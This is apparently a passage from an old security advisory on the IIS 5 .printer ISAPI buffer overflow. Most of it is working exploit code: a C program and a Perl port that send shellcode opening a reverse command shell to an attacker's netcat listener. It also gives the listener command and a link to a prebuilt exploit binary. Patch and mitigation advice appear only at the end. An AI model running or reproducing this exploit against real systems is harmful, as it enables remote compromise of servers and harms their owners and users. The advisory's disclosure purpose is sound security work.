"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";
printf("\nIIS5 printer bufferflow exploit of riley@eeye.com");
printf("\nShell code by dspyrit@beavuh.org");
printf("\nPorted to windows by CyrusTheGreat@Hushmail.com");
Printf("\nBoro Hal Kon! \n");
if (argc != 5)
{
printf("IIS5HACK <IIS Server> <port (80|443)> <netcat host> <netcat listen port>\n");
exit(1);
}
if (!gethostbyname(argv[1]))
{
printf("Error: Cannot resolve server host name!\n");
exit(2);
}
sin.sin_port = htons(atoi(argv[2]));
sin.sin_family = AF_INET;
sin.sin_addr = * ((struct in_addr *)nchostname->h_addr);
if (!(nchostname = gethostbyname(argv[3])))
{
printf("Error: Cannot resolve netcat host name!\n");
exit(3);
}
netcatport = htons(atoi(argv[4]));
netcatport^=0x9595;
netcathost = * ((unsigned long *)nchostname->h_addr);
netcathost^=0x95959595;
exploit[441] = (netcatport) & 0xff;
exploit[442] = (netcatport >> 8) & 0xff;
exploit[446] = (netcathost) & 0xff;
exploit[447] = (netcathost >> 8) & 0xff;
exploit[448] = (netcathost >> 16) & 0xff;
exploit[449] = (netcathost >> 24) & 0xff;
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
exit(4);
}
if ((connect(sock, (struct sockaddr *) &sin, sizeof(sin))) == -1)
{
printf("\nError: Cannot connect %s\n", argv[1]);
exit(5);
}
printf("\nConnecting %s ...\n", argv[1]);
printf("\nSending exploit...");
if(send(sock, (char*)exploit, 1182, 0) == 1182)
printf("OK\n");
else
printf("Failed\n");
Sleep(1);
closesocket(sock);
WSACleanup();
}
Perl port:
#!/usr/bin/perl
# IIS5 remote W2K ISAPI printer buffer overflow exploit (sp 0 and sp 1 )
# Vulnerability found by Riley Hassell <riley@eeye.com>
# Shell code by: dark spyrit <dspyrit@beavuh.org>
# Ported to perl by CyrusTheGreat@Hushmail.com
# shell code spawns a reverse CMD shell , you should setup a listener ..
# use nc11nt for Windows platform, nc for Unix
# nc -l -v -t -p <attacker port >
# Tested on windows (activestate perl ) for portability,
# Shouts to persian bi bokhars,
# Cyrus.pl ver 1.0 Ported to perl by CyrusTheGreat@hushmail.com , April 3rd 2001
$ARGC=@ARGV;
if ($ARGC <3) {
print "\n Usage:\n\n $0 <victim host> <listen host> <listen port>\n\n";
print " Victim Host: Address of IIS5 server to own \n";
print " Listen host: Attacker host IP address \n";
print " Listen port: Port number of netcat listener\n\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto,@exploit);
$remote=$ARGV[0];
$port = 80 ;
$myaddr=$ARGV[1];
$myport=$ARGV[2];
$iaddr = inet_aton($remote) or die "INET_ATON Error: $!";
$netcathost = inet_aton($myaddr);
$netcatport = pack(n,$myport);
$netcathost = $netcathost ^ pack(N,0x95959595);
$netcatport = $netcatport ^ pack(n,0x9595);
$paddr = sockaddr_in($port, $iaddr) or die "SOCKADDR_IN Error: $!";
$proto = getprotobyname('tcp') or die "GETPROTOBYNAME Error: $!";
#$proto = 0;
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "SOCKET Error: $!";
setsockopt(SOCK, SOL_SOCKET, SO_SNDBUF, 2000) or die "SETSOCKOPT Error:$!";
#change the buffer to appropriate size
print "\nConnecting...";
connect(SOCK, $paddr) or die "CONNECT Error: $!";
@exploit = ("\n","GET /NULL.printer HTTP/1.0\n" , "\x43\x79\x72\x75\x73\x3a\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
, "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
, "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
, "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
, "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
, "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
, "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
, "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
, "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
, "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
, "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
, "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
, "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
, "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
, "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
, "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
, "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
, "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
, "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
, "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
, "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
, "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97$netcatport\x52\xd2\x91$netcathost"
, "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
, "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
, "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
, "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
, "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
, "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
, "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
, "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
, "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
, "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
, "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
, "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
, "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
, "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
, "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
, "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
, "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
, "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
, "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
, "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
, "\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
, "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
, "\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a" );
print "\nSending exploit...";
foreach $msg(@exploit) {
send(SOCK, $msg, 0) or die "\nUnable to send exploit: $!";
}
sleep(1);
close(SOCK);
print "\nExploit sent.. You may need to send a CR on netcat listenning port \n";
exit();
Gary Bense found this win32 binary executable for the remote
.printer IIS 5 vulnerability.
http://diseyes.lycaeum.org/backbinp.exe
SOLUTION
Eye Digital Security released, SecureIIS which stops both known
and unknown IIS web server vulnerabilities. Their SecureIIS code
base from about 4 weeks ago actually stopped this latest IIS 5.0
buffer overflow vulnerability without actually knowing anything
about it. It is this power to stop both known and unknown
vulnerabilities that sets SecureIIS apart from every other
security product in the market. Visit
http://www.eeye.com/SecureIIS
to learn more about this ground breaking product.
A patch is available to fix this vulnerability. Please read the
Security Bulletin:
http://www.microsoft.com/technet/security/bulletin/ms01-023.asp
for information on obtaining this patch.
Also eEye Digital Security recommends removing the .printer ISAPI
filter from your web server if it does not provide your web server
with any _needed_ functionality.
If you use the Internet Services Manager to unmap the extension,
you should be aware that this setting can be overridden by group
policy. Specifically, if Computer Configuration | Administrative
Templates | Printers | Web-based Printing is enabled, it will take
precedence over the settings in the ISM. (By default, this
setting is not configured). If you decide to unmap the extension
rather than apply the patch, please be sure to verify that group
policy won't reinstate the extension.